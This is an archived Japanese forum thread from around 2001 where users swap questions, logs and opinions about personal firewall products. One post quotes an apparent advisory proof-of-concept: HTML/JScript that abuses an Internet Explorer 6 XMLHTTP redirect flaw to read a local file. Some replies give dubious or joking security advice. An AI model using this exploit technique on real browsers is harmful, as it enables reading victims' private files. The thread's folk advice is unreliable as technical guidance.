FWIN,2001/10/13,08:52:25 +9:00 GMT,64.71.158.82:8612,218.123.***.**:3128,TCP (flags:S)
FWIN,2001/10/13,08:52:32 +9:00 GMT,64.71.158.82:8613,218.123.***.**:8000,TCP (flags:S)
FWIN,2001/10/13,08:52:39 +9:00 GMT,64.71.158.82:8614,218.123.***.**:81,TCP (flags:S)
FWIN,2001/10/13,08:52:46 +9:00 GMT,64.71.158.82:8615,218.123.***.**:8081,TCP (flags:S)
FWIN,2001/10/13,08:52:53 +9:00 GMT,64.71.158.82:8616,218.123.***.**:1080,TCP (flags:S)

と、ちょっと大袈裟にかいてみたり（藁

>>620
串チェックじゃないの？

ＶＢやぞぬって、スタートアップに入れてないのに起動させると勝手に常駐するよね？
あれって解除する方法ないの？

>622
ぞぬは「スタートアップに登録」ってチェックがあるよ。
「設定」の中。
常駐を解除したいなら、タスクバーのゾヌを右クリックして終了させればいい。

ぞぬを使ってるんですが、ライセンス登録ってしたほうがいいんですか？
英語わかんないんでうが・・・

>624
>>2の日本語化パッチはあてた？

>>625
ぞヌじたいはパッチ当ててるんでナントカ使えてるんですが
ライセンス登録って何ですか？

金払う。

>>627
ふ＾＾＾＾＾＾＾ん

>>623
あ、ホントだ（ｗ
ぞぬに関しては俺が見落としてた、ｽﾏｿ・・・。

ＶＢに関しては、相変わらずスタートアップにも入れてないのに勝手に常駐してしまうんだけど、
誰か知ってる人いたらこれの解決法教えて・・・。

>>629
ファイル名を指定して実行
msconfig
スタートアップ
チェックを外す

だと思う

>>629
スタートアップって、スタートアップフォルダのこと言ってる？
Win9x系ならmsconfigしてみれ

>>630 631
(・∀・)！
そこのスタートアップからpccguide.exeってやつのチェック外したら起動時の常駐を解除できました。
どうもありがとう！

自分もFWソフトを入れてみようと思い
最近ZoneAlarmを導入したのですがひとつ困ったことが･･･。
自分のサイトのデータをミラーリングダウンロードするとき
lock.fileのような0バイトのファイルが全然落ちてこないのです。
（実際は落ちてるようなのですがFTPクライアントが終了を確認できないようです）
最初は使ってるFFFTPが原因かと色々設定を変えてみたりしたのですが
結局ZoneAlarmを切ってみたらうまくDLできました。
これってほかのかたでも起きるようなトラブルですか？
ちょっと確認したかったので質問させていただきました。

>>613です。
ZoneからまずTinyに乗り換えてみましたが、私にはちょっと敷居が高く感じました。
わからないまま設定して穴だらけになってもまずいと思い、結局Outpostを入れることに。
インストール時に「Tiny入れてんのかぞｺﾞﾙｱ　消さねーとどうなっても知らねーぞｺﾞﾙｱ」って
言われたので、この時点でTinyとはサイナラしてしまいました。

>>615さんのおっしゃる通り、けっこう安定しています（Win2kだからかもしれませんが）。
設定もラクチン、特に重さも気になりません。

おまけ（？）の広告カット機能もイイ感じです。
URLによるブロックとサイズによるブロックを併用してるんですね。
「468*60の画像は表示しない」とか。デフォルトで88*31を切られたのは
ちょっと困りましたが、まぁ問題ないレベルです。

というわけで、Outpost、オススメです。

BBテクノロジーからやけにアタックされてるよ。
これってYBBのユーザーだよね？

複数のファイアーウォールを同時に使う必要性。
ファイアーウォールも自社のサーバーに勝手にアクセスするので念のために複数
のファイアーウォールをインストールする必要があります。私はBlackICE, Syg
ate Personal Firewall, Zone Alarm Proを入れています。Sygate Personal
Firewall, Zone Alarmは個人使用の場合は無料です。Zone Alarm Pro は有料
です。（Sygate Personal Firewall　は無料でも登録するまでは起動するごと
に登録申請画面が出てきます。）三つを導入するとすぐにSygate Personal Fir
ewall が Zone AlarmやBlackICE が「インターネットにアクセスしようとして
いますが、許可しますか」と聞いてきました。私は製品のバージョンアップ情報
でも調べるためにアクセスを求めてきたと思っていましたが、その項目のチェッ
クをはずしていたのでその訳がありません。（製品のバージョンアップ情報をチ
ェックするという項目をオンにしようが、チェックを外そうが関係なくインター
ネットにアクセスを求めてきます。）Zone Alarm　はZone Alarm　で「Sygate
Personal Firewall がインターネットにアクセスしようとしていますが、許可
しますか」と聞いてきます。それも登録はすでに終わっているにも関わらずです
。ファイアーウォールの主な任務は外部からのコンピュータへの不正アクセスを
監視・遮断することにあるのであって、インターネットにアクセスして自社のサ
ーバーに情報を送ることではないはずです。後で分かったことですが、ファイア
ーウォールも妙な動きをするのです。Zone Alarm　や　BlackICEも怪しいらし
いのです。ですから複数のファイアーウォールーを入れてお互いに監視させる必
要がある訳ですSygate Personal Firewal　の登録申請以外はこれらのファイア
ーウォール のインターネットへのアクセスを許可する必要はまったくありません
。そこまで神経質になる必要はないという人も多いと思いますが、私のコンピュ
ータなのですから、情報の出入りを決めるのは私であってアプリケーションやマ
イクロソフトではないというのが私の立場です。

>636
情報の出入りを決めるのは、OSやアプリケーションであって、
あんたじゃないよ。たぶん。きっと。おそらく。

たまの早起きなのにもう鬱だ

>>636
＞自社のサーバーに勝手にアクセスするので
どうやってそれを知ったの？FWが表示してくれた？

＞複数のファイアーウォールをインストールする必要があります
多くの人には必要ないです。よい子はまねしないでね

＞三つを導入するとすぐに
回線切ってても？ループバックじゃなくて？

＞複数のファイアーウォールを入れてお互いに監視させる必要があるわけです。
え？ソフト間に優劣はないの？データの流れは？

＞情報の出入りを決めるのは私であって云々・・・
気まぐれでウィルス撒き散らさないでね

>>636
ごめん、ごちゃごちゃしてたから読んでないや
もう一度整理してレスして

>>636
どこを縦に読むんだ？

三つも四つもいれるぐらいに心配ならルーター使えば。

>>636って暗号じゃないの？

とりあえず>>636がイクロソフトでないことだけは判った

>>636
新たなテロ予告？
指令？

どなたか、 IN に Trojan が出る現象について教えてください。
INなら大丈夫だと聞いた事がありますが、
ZoneAlarmで今まで2回出た事がありまして、不安です…。

>>636
漏れのノートンも、「IE.EXEがインタネットにアクセスしようとしています」
って出ます！！！
ブロッキした方がヨカれすかぁ？！

えへへ

test

test

test

とりあえず定期ageしとくよ。

ぞぬスレで聞いたんですが答えがなかったので聞きますが
ぞぬの設定にDisrtibuted COM Servicesというのが入ってるけど
これってなんなのかな？
回線につなげる時に許可するかどうか聞かれるんですけど。

既出だったらごめんなさい

ぞぬからＮＩＳに変えたら、ぞぬの頃はひっきりなしだった
警告がぱったりこなくなった。ＮＩＳは有効になってるんだけど
なんか逆に不安。大丈夫なの？

>>652
DCOM が何なのか説明するのはこのスペースじゃむり。
てもインターネットで使うことはまずないので
許可せんでよろしい。

>>653
多分大丈夫。

>>653 心配だったらシマンテックのサイトにセキュリティチェックがあるから試してみて。

Flash Get等のツールで無料版は
スパイウェアと言うのがユーザーに黙って入れられていて
ネットに繋いでる間、時々情報を特定の場所に発信してしまうらしいです(>_<)
メルアドやらどんなＨＰをよく見てるかとかみんなばれちゃうんですね・・・
ゾーンアラームと言うファイヤーウォールソフト（個人使用なら無料 (-o^)v ）を
使ってネット接続中にFlash Getを立ち上げると
何もＤＬしていないのにいきなり何かを発信してゾーンアラームが
通過を許可するかどうか聞いてきます（もちろん不可 (^^;) ）
どうも何か情報を発信して応答が帰ってくると
表示される広告が変わるような感じですねぇ・・・よく解りませんが・・・
でもFlash GetのはADawareとかいうソフトで削除出来るんでまだ良心的（？）です・・・
聞くところによるとREGETのはたちが悪く
一旦削除しても使ってるとREGETがまた勝手にインストールしてしまうとか・・・ (ｰ_ｰ;)
そこまでして個人情報を手に入れたいのか？

>>654さん
お答えありがとうございます
そうですか、では許可しないことにします
ありがとうございました。

age

Sygate4.1を使っていて
http://scan.sygatetech.com/
このサイトのQuick Scanを実行すると、以前はBlockedになっていたのに
いくつかのポートが（80,110,113,139,443,445,1080,2757)
Closedになりました。設定は以前と変えていませんし、スキャン時に
使用しているアプリも同じです。
Stealth Scanだと、全てBlockedになります。
最新版4.2 build872にアップグレードして試しても
結果は同じでした。Quick ScanとStealth Scanでは、スキャン方法が
違うのでしょうか。また、Quick Scanが以前と結果が変わっている
原因のわかる方いるでしょうか。

ZAとZAProどっちがいいですか？どちらも日本語化されてるみたいですが

ファイアウォールソフトを個人向けPC新モデルのほぼ全機種に採用（NEC）(2001.11.1)

https://www.netsecurity.ne.jp/article/10/3187.html

↑このソフトの画面って,ゾヌそのままのような気がするんだけど、ゾヌを日本語に直しただけじゃないのですか？

それは、ぞぬのOEMだよ。
でも、本家のほうが定期的にバージョンUPしてくれる。
買わんほうがいいよ。

Sygate使ってるんだけどﾃﾞﾌｫﾙﾄの設定のままで立ち上げて置くだけで安全？

>>664
んなはずない、どこからそういう考えが生まれるんだ？

なっ、なんと……ちゃんとセキュリティ勉強してこよう…………

>>664
Sygateならデフォルトでもポートが閉じられてるから大丈夫だよ。

閉じてるんじゃなくて、ブロックされるのか。

test

クローキングってなんですか？

ネットワークからかくれんぼすることです。

Sygate Personal FireWallが、

「Windows Kernel Core Compornentがなにか送ろうとしているよ」

という警告を出してます。


いまのところ禁止していますが、これってまずいことなんでしょうか。
kernelって何か知らないしこわいです。。

>>672
見てるとSygateもいつの間にか地に墜ちたね。って思った。

age

Firewall-1のCVP対応のウィルスサーバソフトを
使っている人いますか？
下記のどれかを導入を検討しているのですが。。。
他にもあったら教えてください。

F-Secure アンチウィルス
http://www.f-secure.co.jp/

Norton AntiVirus For Firewall
http://www.symantec.com/region/jp/enterprise/products.html#virus

InterScanVirusWall
http://www.trendmicro.co.jp/product/isvw/index.asp

WinMXで交換中にZoneAlarm起動したら、途端にDL、ULともに速度が
ゼロに。
ZA立ててからMX起動したら、通信はできてるのに検索リストには
一向に反応がありません。
設定でMXは全部通過にしてるんだけど、なんででしょうか？

WAN側のセキュリティを「高」にしてるからかなぁ…。

>>676
基本的にファイアーウォール等は、ネットの通信を
行ってない時に起動、終了させるもんだよ。

ZoneAlarmを起動させてら、MXを起動させれば
いいんじゃないの？

ZoneAlarmを起動させると通信中のは一旦全て遮断されます。

なるほど、ありがとうございました。

途中でZAが起動してなかったのに気付いたもので。
気をつけます。

ターミナルスレッドあげ

Outpostはどこから落とせば良いの？

>>680
http://www.agnitum.com/products/outpost/

95にTINYのせてます。
ためしに、TINYをはずしてShields UP!でスキャンしてみたら、NetBIOSが
OPENになっているとのことでした。
んでしばらくすると、接続されて自PCのnameが表示されちゃいました。
かなりビビりました。

このNetBIOSって通常はOpenになっているものなんですか？
TINYを起動しない状態でNetBIOSを許可しないようにするには、どう設定
すれば良いのでしょうか…

>>682

わかりやすいのはココ。
http://tools.bb.yahoo.co.jp/setup/adsl/security/95.html
Y!BB用のページだが、この内容はプロバイダに関係無く適用できる。

ＸＰのパーソナルファイアウォールどうですか？

XPのファイアウォールの使い方がよくわからん。
ブロックできてるのかなー。
ログには何も残ってないし。
「ドロップされたパケットのログをとる」にチェック入れれば良いんだよね？
あと、詳細設定はどこにチェック入れて良いのかよく分からない。
教えて☆

>683
ありがとございました。
MicrosoftNetworkのバインドを外せばよかったんですね。

ところで、スレ違いかもしれませんが、TINYを初めて入れたときに
各ソフトの通信を許可するダイアログがでますよね。その時に、常駐
してるrnaappっていうのもネット関連らしいんですが、コレはどういうことを
してるモノなんですか？
常駐させといていいものなんでしょうか。

少しでも重くなると本末転倒だから
ソフトじゃなくてハードがほしいんだけど
完全なやつないかな

お聞きしたいのですが、マック用のフリーのファイア−ウォ−ルソフトってありますでしょうか？

NIS切ってhttp://scan.sygatetech.com/quickscan.htmlやって
みたら全部「Closed」になったんですけど、本当にファイアーウォ
ールって必要なの？

>>689
ClosedとBlocked（Stealth)の違いを考えれば・・・・・
「んなもん同じだろハゲ」って人はファイアーウォールは
入れない方が良いね、ネットで不都合出るだけになっちゃう
だろうし。

ファイアウォール以外の設定で、Win98上でポート80を
ステルスにする方法はどうやればいいのでしょう。

207.33.111.34

15分くらいで500回もアタックするってどういうこと？

VB2002のクローキングので1日20回ぐらいあるんですが、
これって普通ですか？
ログのほとんどが、韓国のIPです。

ファイヤーウォールの隠語ってなんでしたっけ？？
教えてくださいです。

>>694
「ファーアウォール」

From　Windows板

http://pc.2ch.net/test/read.cgi/win/991573646/l50

>>694
ビニール傘

Black ICEを入れたら、OS起動すると必ずネットに接続しようとする。
いったんBlack ICEをアンインストールしたら接続しなくなったのでBlack ICEが原因なのは
わかったんですが、どうしたらOS起動時にBlack ICEが接続しないようになるんでしょう？
フレッツのない地域なので余計な課金が発生してこまってます。

>>697
１．自動接続設定切る。

>>698
どうも。
>>697
に書き忘れていたことがあります。
ダイアルアップルータでISDNです。
自動接続設定とかは関係ないと思います。
ルータの方の自動発呼をきると不便なので、OS起動時にBlack ICEが接続しないように
したいんですが、どうしたらいいでしょう？

どうやらBlack ICEが名前解決に逝っているようです。
コレはOFFにできないんでしょうか？

>>697
そのBlackICEはMXで落としたキージェネ付き？
それは木馬にやられてるから

トレンドマイクロ　オンラインスキャン
http://housecall.antivirus.com/housecall/start_jp.asp　でスキャンしてみ。

ソースはここ。っつーか俺もやられたYO!
◆□◆　破損、トロイ、ウィルス入り　◆□◆
http://pc.2ch.net/test/read.cgi/download/1000483999/

正規ユーザーならｽﾏｿ。

最近Tinyいれましたが

blockedOUT TCP 216.29.191.9:10000

連発してます。モールクンどっとこむだと？？
これって何？？

>>702
たぶんカウンターじゃないかな？
俺もコレ気になってブロックしてみたらカウンターが表示されなくなった。

>>703
そーなんだ。じゃDennyしといて放置で
OKですね。。

Tiny入れました。
インターネットに接続するたびに、
以下のPing?が3つ外に出ようとするのですが、
これは何なんでしょうか。

リモート
ALL-ROUTERS.MCAST.NET[224.0.0.2]-ICMP[10]Router Solicitaion
詳細
Aplication from your computer wants to send ICMP packet to ALL-ROUTERS.MCAST.NET[224.0.0.2]
アプリケーションの詳細
tcpip kernel driver

あと、61.123.201.51（日本テレコム株式会社 中国支社?）から
しょっちゅうPort113にアクセスがあるのですが、
これは何をしに来てるんでしょうか。。

>>94
俺もBlackICE入れてんだけど、まったく反応しないよ？
最近フレッツで常時接続になったんだけど
環境がルータ使ってるからなんでしょうか？
エムエックス使用の為静的NAT機能でポート指定とかしてると
アタックとか侵入とかされないの？

ファーアウォール

定期

先日、初めてファイアーウオールを入れたんですけど・・・（ＺｏｎｅＡｌａｒｍです）
通信中、ブロックしたとのメッセージが出たので、ＩＰドメインサーチしたら、
下のような結果になりました。なんだか、中国の上海にある学校のようです。そこの
ＨＰにも飛べました。何かヤバイのでしょうか？

inetnum: 202.114.224.0 - 202.114.239.255
netname: ZNUFE-CN
descr: zongnan university of finance and economics
country: CN
admin-c: WW3-CN
tech-c: WW3-CN
notify: [email protected]
changed: [email protected] 960501
source: APNIC

>>709
やばいぞそれ！
早くしかるべきところに届けたほうがいい。

>>701
BID25chJ2.exeってやつで、オフィシャルからDLしたものなんだけど、
やっぱり外にパケットを吐いてるよ・・・・
トライアル版でも吐くから何か送ってるのかなぁ
使うのよそうかな・・・・

あげ。

>>1-3が　この板全体にとって重要だからage

tiny：フレッツADSLにしたら使えなくなった。
ゾーンアラーム：なんか不安定になる。しょっちゅう電源ブチッ。
Sygate：日本語化パッチがないけど、安定してるし、細かい設定ができてイイ！

ウチは、快調だけど？？？？？
もしかして「フレッツ接続ツール」なんて糞ソフト使ってるんじゃ
ないんだろうな。。。。（ﾜﾗﾜﾗ

>>714
715さんの補足なんですけれど，ツールと相性があるらしいです。
flet'sをお使いでも他のPPPoEツールを使うなりWinXPにするなりでtinyは使えます。
NTTが悪いわけではないんです…。RASPPPoE，軽いですしフレッツ接続ツールの
代わりにいかかでしょうか? 接続もファイアウォールも両方軽くなるかと存じます。

>>711
それは、アタッカの名前逆引きの為に
NetBIOSのパケット吐いてるだけでしょ？

いまどき相手の名前なんてどうでもヨイだろし、
名前解決をしない設定にしてみたら？
（というか、オフィシャルのFAQちゃんと読め）

>>705
それはPingじゃないよ。
じゃあ何だと言われても困るが、そのICMPは気にするな。
プロバイダーとのネットワークの調整みたいなものをやってるんだろ。

たまに　人目につくようにあげておきます

1年くらい前に日本語のファイアーウォールが出て体験版使ってみたんだけど、
なんてソフトか覚えてる人いない？
１万円以上して高すぎって思ったんだけど。

http://www.socks.nec.com/

これはどうなんだ？

Windowsユーザは手を出さんだろ
UNIXホストとWindowsクライアント、個人利用なら使わにゃ損だけど

Windowsクライアントに戻そうかな・・・

なんつーかバカの多いスレだな(ﾜﾗ

　　 ∧＿∧　　／￣￣￣￣￣
　　（　´∀｀）＜　オマエモナー
　　（　　　　） 　＼＿＿＿＿＿
　　｜ ｜　|
　　（_＿）＿）

age

KOREA TELECOM ,おれのＰＣへの侵入やめてくれ〜〜〜〜〜〜。

61.194.6.73　　アタック、ＰＣへの侵入やめてくれ〜〜〜。

sygateのスレはあるのでしょうか？
どなたかリンクしていただけませんでしょうか？

http://pc.2ch.net/test/read.cgi/sec/993936202/

>729
どーもです。

もの凄いアフォな質問かもしれませんが、ぞねを始めとするフリーソフトのＦＷは、クッキーの管理はできないのでしょうか？
わからないので教えて下さい。

>>731
俺もよくしらないけど、ZONEとかはプログラム毎に良いか駄目かを
設定するだけじゃなかったかな。要するにデータの中身そのものは
チェックしないと思うよ。クッキーを設定したかったらオミトロンは
どうかな、あっちは設定できたと思うよ。

試しにNIS入れてるけど、これってアクセス制御対象のプログラム
のバージョンが上がっても、変更を認識して警告してくれるの？
ZoneAlarmはTrueVectorってので素晴らしい認識だけんど・・。

それとNISってプログラム削除して再インストールしてもHDのどこかに
ゴミ残して期限延長出来ないようにしてる？だとしたら危険なソフトだね。(w
レジストリクリーンソフトで対応できないのだろうか…。

それと、プライバシー制御っていうけど、デフォルトでは
Weferer: LHPQQWOYIYZUNNYCGPKYLEJGDGVCJVTL
Wser-Agent: BXFGGMEPYOQKEDOTWFAOBUZXUWLSZLKBRNVWWCUFPEGAUTFJMVRESKPNKMB
んなの吐き出してるでそ？これって相手方にノートン使ってますよ！
って言ってるようなもので、セキュリティー上はFWが秘匿なのよりは
憂慮すべきことなんじゃないのかな・・・　＞ノートン使いさん達？

全ては金払ってからからだ

俺も、金払ってないソフトには、
たとえトロイが入ってても文句は言えんな

ブロックしたときに「ふぁいあーうぉーるっ！」と叫び、
ウィルス検知・処理した時は「黄昏より..云々..うぃるす すれいぶっ！」と叫ぶ、
CV=林原めぐみの、「ウィルス スレイヤーズ でらっくす2002」がほすぃ

>>737
とりあえず、イベントと音声ファイルを対応させてみようよ。

ﾎｽｨ!

それが出来た暁には是非CodeRedの亜種も頼む

ただ、漏れは絶対使わない（w

Internet Explorer 6 Allows Local File Reading (XMLHTTP)
http://www.securiteam.com/windowsntfocus/6W00D2K3FS.html
http://www.xs4all.nl/~jkuperus/bug.htm
<html>
<head>
<title>Exploit</title>

<scr!pt language="jscript">

function doIt() {

// open the file on the users harddisk using a http redirect

var xmlhttp = new ActiveXObject ("Microsoft.XMLHTTP");
xmlhttp.Open("GET", "servlet/RedirectServlet?fileName=c:/jelmer.txt", false);
xmlhttp.Send();

alert(xmlhttp.responseText);

}

</script>
</head>
<body>

<button onclick="doIt()">Do it</button>

</body>
</html>
−−−−−
Internet Explorer Document.Open() Without Close() Cookie Stealing, File Reading, and Site Spoofing Bug
http://www.securiteam.com/windowsntfocus/6B00L003FU.html
http://www.osioniusx.com/

友人からDOSアタックを受けているのですが、FireWallで防げるのでしょうか。
当方はWin2kを使用しています。
クソ、新参者だからってなめんなよ。

ふつーDOSアタック仕掛けてくる奴は友人じゃ無いだろ…

ZoneAlarm　+　ノートン2002体験版　+　バスター2002体験版　+　黒氷体験版

これで無料＆最強！

>742
DoＳ自体でｵﾁるんなら、面倒みきれません（苦ｗ

>>743,745
742のメール欄見れ。

>>744
ウィルスに破壊される前に、システムエラーの連続で破壊されない事を祈ります（ｗ

さっきからＣｏｍｅｔＵＩ　Ｍｏｄｕｌｅ（Ｉnternal build)が
インターネットにアクセスしようとしてますと出て怖い。
ダウンロードうっかりしてしまった。危険程度が中程度と出て
ヤバそう。ネットにつなげたらいきなり出てきてしつこい。
いったいなんなのでしょうか？
コピペしようと思ったんですがいくらコピペしようとしてもコピペできない。

Ｉｎｔｅｒｎｅｔ　Exspoloreがインターネットにアクセスしようと
してますとよく出てきますが、これは何なのでしょうか？
危険程度は低だと出ますが。許可していいのでしょうか？

BlackICE使ってるんですが一日３０回アタックを受けます
常時接続とは言え不安です。

もう、さっきからずっときてます。いったい何なのでしょうか？
怖いです。
アプリケーションＣ：￥ＷＩＮＤＯＷＳＹ　ＳＹＳＴＥＭ￥ＣＯＭＥＴ￥
ＢＩＮ￥ＣＯＭＥＴ．ＥＸＸ
プロコリル：ＴＣＰ（アウトバンド）リモートアドレスｆｉｌｅｓ．ｃｃ．
ｃｏｎｅｔｓｙｓｔｅｍｓ．ｃｏｍ（２０８．１７８．５０．２４４）
ｈｔｔｐ１８０）
ローカルアドレス：サービスポート１１５７
Ｎｏｒｔｏｎ　Antivirusをインストールしていません。アプリケーションを
ウイルススキャンできませんでした。
このアプリケーション用の自動設定データはありません。
このアプリケーションはＷＩＮＤＯＷＳフォルダに入っていて
その会社（Comet　Ｓｙｓｔｅｍ．Inc）は既知の会社のリストにありませんでした。
このアプリケーションにはデジタル署名がないかまたはデジタル署名が
無効です。
↑
と何度も出るんです。怖くてたまりません。

>>749
別スレでも同じ症状が出ているのが書かれている。
まだ、原因はわからないけど、気持ち良いもので無い事は確か。
数ヶ月もすればMicrosoftが「エラーで、情報が漏れていました。致命的なエラー」
とか、発表しそうで怖い。ちょうど、SP1が出るのが3〜5月頃と言う話もあるし…

cometってスパイウェアじゃないの？
Ad-awareでも入れてみたら？

>>750
Pingの回数を全て叩き出しているのなら、個人で差はあるけれどもそれくらいはある。
自己防衛に徹して、最低限の知識を踏まえて、自爆しない限りは、大丈夫だと思う。
BlackICEはアタックを受ける度に出てくるから。
常時接続とは、便利な反面危険も伴う。諸刃の剣。

>>751
>>753の意見に禿同。検討を祈る。

たしかに 金払ってないソフトには、 たとえトロイが入ってても
文句は言えんな

tcp_wrappersとか

ttp://www.soft4ever.com/LooknStop/En/index.html
↑これってどうよ？
誰か入れれ。

東めた　なんでPC覗きにくるの？

>>758
禿げだから。

　　　　　　

先生！
ルーター入れたら不正アクセス全然されなくなったので
FWソフトはずしてもいいですか？

http://www.introhightech.com/index-5.htm←ここにあるノーハッカーというソフト
っていいんですか？
なんかあんまり聞いたことのないソフトなんですけど・・・。

age

>>762
高かろう悪かろうじゃないだろうね。

使った人いるの？

ドイツ語わからんすぎて内容が理解できんのですが一応

製品紹介
http://www.tecchannel.de/software/405/index.html
テスト結果の内容
http://www.tecchannel.de/tecdaten/show.php3?navid=2&catid=84&pageid=425
Produktの欄の中にある、長方形の小さな画像をクリックすると詳細が見れる。

なんでドイツ語ファイアウォールを入れたいのかと小一時間。。。

ZoneかOutpostどっちがいいの？？

>>766
いや、そうじゃないんです。
いろんなファイアウォールの性能をテストしているところなんです。
見たところTinyの評価がそんなによくないんで詳細が知りたくなったんです。
マカフィーのはもっと低いけど…

>>768
えぇ・・Tinyの評価かなり高いと思うけど・・（汗

漏れ的評価・・・

Tiny ＞＞ ZoneAlarm ＞ Sygate ＞ その他

あっPFWじゃないけど外からの攻撃には黒氷も（･∀･）ｲｲ!

総合評価の前になにかいっぱい検査しているのだがよくわからん。

Tinyは Flexibilitat という奴は高い評価
Schutzwirkung というのはまぁまぁみたいだけど
Bedienung というのがボロボロ。

翻訳サイトを探してやってみたけど
Schutzwirkungは保護効果という意味で、Bedienungは評価サービスと言う意味らしい。
高い評価を受けていたFlexibilitat は意味がわからなかった。

ZoneAlarmは保護効果と評価サービスがよく、Flexibilitatはまぁまぁ。
Sygateは保護効果と評価サービスがよいが、Flexibilitatはやや低い。
マカフィーはすべてがやばい。
ちなみにノートンは物凄いがこれはアンチウィルス機能や広告ブロック等がいっぱいついてるからっぽい。

結局Flexibilitatの意味がわからないと実際どれがいいかわからなさそう。
ちなみに2001年7月のものなので。

>>771
「わかりやすさ」じゃね？（ｗ

http://www.logovista.co.jp/trans/text/textframe.html
でFlexibilitatを翻訳したら柔軟性と出た。

Bedienungは↑だとサービスとしか出ないけど、
AltaVistaでEnglishに翻訳してみたらOperationと出た。
操作性って事だと思う。

とにかく2001年7月の評価じゃ古すぎるよね。

まあ自分で使ってみなさいってことだーなあ

Tinyはログがｼｮﾎﾞｲ　2バイト文字のファイルパスに対応してない

>>744
> バスター2002+黒氷
この組み合わせ、落ちませんかぁ... うちの3台まとめてインストールしたら、全部が全部、ブルー画面にも飛ばずに落ちる... 復旧に○一日。(T-T
どっちを削るか!? んで、バスターをあきらめた。

>>775
>>744はネタ

age

Tinyはかなり深いレベル（ドライバ）で動いてる。
MD5認証のプログラムフィルタもあるのでトロイによる他プログラムの騙りも防止できる。

http://members.tripod.co.jp/eazyfox/Firewall/Tiny/architecture.gif

>>778
スタートアップもすごい早い所で起動しますよね。
すっきりデフラグも勝てない。

Received: from cc.sookmyung.ac.kr (203.252.201.4) by sitemail.everyone.net with SMTP; **
Received: from vv68gIjB6 (localhost [127.0.0.1]) by cc.sookmyung.ac.kr (8.9.3/8.9.3) with SMTP id ** (KST)
From: [email protected]
Date:**
Subject: Need Help? Benefactored Program...hurry don't miss out!
---
Hello Friends,
If you need HELP and would like to be benefactored
into a new FABULOUS
program, please let me know right away!! I will put
you into a
"temporary" matrix to hold your position until the
company allows us to enter
people on Feb. 4! The overflow will be enormous.
Please reserve your
spot now!
Send your info to
[email protected]
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to me [email protected]
---
egret.sookmyung.ac.kr (pri=20)
接続に失敗：ネットワークが混雑しているか、サーバが停止している可能性があります。
-----
cc.sookmyung.ac.kr (pri=10)
< 220-InterScan Version 3.6-Build_1166 $Date: 04/24/2001 22:13:0052$: Ready
< 220 cc.sookmyung.ac.kr ESMTP Sendmail 8.9.3/8.9.3;
> HELO rlytest.nanet.co.jp
< 250 cc.sookmyung.ac.kr Hello localhost [127.0.0.1], pleased to meet you
> MAIL FROM:< http://www.nanet.co.jp/rlytest/[email protected] >
< 250 < http://www.nanet.co.jp/rlytest/[email protected] >... Sender ok
> RCPT TO:<[email protected]>
< 250 <[email protected]>... Recipient ok
> QUIT
< 221 cc.sookmyung.ac.kr closing connection
問題あり：不正な中継を受け付けます。
(203.252.201.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。　　　

ZAからTinyに乗り換えたのですが、ZAのようなタスクトレイのネットワークインジケーター
がなくってちょっと残念です。
何かフリーで使えるソフトはないっすか？

>>781
接続のプロパティ見とけ　あれで十分

TrayMeterとか。

Sygate Personal Firewallが最高だね。

英語分からない馬鹿には使えないだろうけど。

あははは。

　

>>781
これにしとけ。悪くない。
ttp://load.3nopage.com/

>>781
outpostがかなりお勧め。

ZAは馬鹿専用。

Sygate Personal Firewallにしておけ。

sygate vs tiny、勝者はどっち

>>789
tinyだろ。　俺使ってるし。

あうとぽすとは？

Tiny Personal Firewallを使い始めて気付いたのですが
省電力機能が働かなくなりました。（win98）

対処法ってありますか？

>>781
俺は窓の杜で紹介されてたNet Activity Diagram。
そのまえはTrayMeter使ってた。

http://www.metaproducts.com/

>>788
ZONEは馬鹿専用ってことは
馬鹿でも使えるすぐれものって事？

>>789
Tiny　おれも使ってるし。

>>794
その通り。

>794
表現、悪いがＺＯＮＥはその通り優れたソフトだと思う

今回、ＴＩＮＹにして、その事が良くわかった（昨日導入）
昨日から、一日かかって設定した。
しかし、ＩＣＭＰってナンダ？の私には難しいぞ

ＺＯＮＥは、ほどんど、設定いらずだったから

が、軽いのでこのまま、使うことにする

初期起動のリソースが86％になった
ＷＩＮＭＥ　H+BEDV　ＴＩＮＹ　常駐

ZoneAlarmの話する時はProかFree版か付けて欲しい。

＞797
free版です

ｔｉｎｙのｌｏｇに
blocked; Out UDP; localhost:68->(null) [210.236.160.75:67]; Owner: C:\WINDOWS\SYSTEM\KRNL386.EXE
とある。

このＫＲＮＬ３８６．ＥＸＥは正常の動きなんですか。何か問題があるのですか。ウイルススキャンでは白だったのですが。
　今、過去ログを見ているのだけれども・・・・・

Sygateの日本語パッチは無いのでしょうか？
または日本語解説ページでもいいです。

>>798
それは DHCP
Tinyスレの過去ログにも何度も出てる。
せめてOSとか接続環境を書かないと、
遮断するべきかどうかアドバイスできないよ。

>>799
日本語解説なら…ある。だけど
最低限>>1の内容とリンク先ぐらいは
読んでから質問しようね。

タイニー使い始めて4ヶ月は立つけど今だ設定なんてしてねーよ。
適当適当

（　ﾟ∀ﾟ）あひゃひゃひゃｈｙ

＞＞800
解決しました。
アドバイスの通りですね
確かに過去ログにありました。

どのFirewallでﾈｯﾄﾐ使える？
Tinyはxpが落ちるわ、Outpostは相手の画面見えないわで散々。
どっちもconf.exeに対してAny(TCP,UDP),Both direction ,Permitにしてるのに・・・。
ﾊｧﾊｧ

>>796
Internet Control Message Protocol
通常は必要なし

Tinyも
いいけど、許可したネット系アプリとの相性が悪いとOS落っこちる。
はぅー。

Sygateでタスクトレイにあるアイコンが
通常の通信のときは水色に光ってるんですが、
たまに赤くなるときがあります。
どんな時に赤くなるのでしょうか？

今さらノートンｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨ2001入れたら、起動時にＣドライブやＤドライブの
フォルダが開きます。どっちかだけ開く時もあれば、開かない時が。
なんなんでしょ？？

＞＞806
ありがとう

↑マルチ

>>805
NetmeetingはインバウンドのUDPの接続がネックになって
設定が難しいです。一度挑戦して相手の画面は見えたことがあるのですが
声は聞こえませんでした。

↓ここ参考になりませんか？
http://www.ok96.co.jp/users/hidexpro/nm/nmlan.html

以前挑戦したときはいまいちよく理解できないまま設定しましたが
ひょっとすると、一部のUDPでアプリケーション指定してはいけないのが
あるのかもしれません。

>>810-811
マルチポストありがとうにﾁｮｯﾄﾜﾛﾀ。

ageee

んでさー、とりあえずぞぬのプログラムで。
service and controller appって何？
w2kなんだけどトロイってこと？

なんでもかんでもトロイとほざくやつが多いな　ちっとは自分で調べろ

Sygateってポートスキャン等の警告のダイアログって
表示されないのですか？
プリーズティーチミー

